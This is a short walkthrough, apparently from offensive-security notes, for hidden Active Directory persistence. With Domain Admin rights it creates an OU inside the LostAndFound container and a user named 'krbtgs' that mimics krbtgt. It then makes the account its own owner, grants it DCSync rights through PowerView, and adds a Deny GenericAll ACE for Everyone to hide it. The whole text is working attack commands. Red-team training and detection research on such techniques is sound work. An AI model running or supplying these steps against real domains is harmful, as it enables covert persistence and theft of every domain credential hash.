Import Active Directory module:

Import-Module .\\ADModule-master\\Microsoft.ActiveDirectory.Management.dll

Create a new OU called System inside LostAndFound container (as Domain Admin!):

New-ADOrganizationalUnit -Name "System" -Path "CN=LostAndFound,DC=domain,DC=domain,DC=domain" -Verbose

Even though the powershell command seems to return an error, the System OU is still created as we can see:

Create a new user called krbtgs inside the newly created System OU

New-ADUser -Name "krbtgs" -SamAccountName "krbtgs" -Path "OU=System,CN=LostAndFound,DC=domain,DC=domain,DC=domain" -AccountPassword(Read-Host -AsSecureString "Input Password") -Enabled $true

Change the owner of this newly created user account setting himself as owner (using PowerView):

Set-DomainObjectOwner -Identity krbtgs -OwnerIdentity krbtgs -Verbose

Assign to it DCSync rights (using PowerView):

Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=domain,DC=domain" -PrincipalIdentity krbtgs -Rights DCSync -PrincipalDomain <domain> -TargetDomain <domain> -Verbose

Create raw objects in order to hide the user account:

$user=Get-DomainUser krbtgs
$UserOU= $user.distinguishedName.Substring($User.distinguishedName.IndexOf("OU="))
$RawObject = Get-DomainOU -Raw -Identity $UserOU
$TargetObject = $RawObject.GetDirectoryEntry()
$RawUser = Get-DomainUser -Raw -Identity krbtgs
$TargetUser = $RawUser.GetDirectoryEntry()

Create ACE entries to deny Everyone (S-1-1-0) the GenericAll on this user:

$Ace = New-AdObjectAccessControlEntry -InheritanceType All -AccessControlType Deny -PrincipalIdentity "S-1-1-0" -Right GenericAll
$TargetUser.PSBase.ObjectSecurity.AddAccessRule($Ace)
$TargetUser.PSBase.CommitChanges()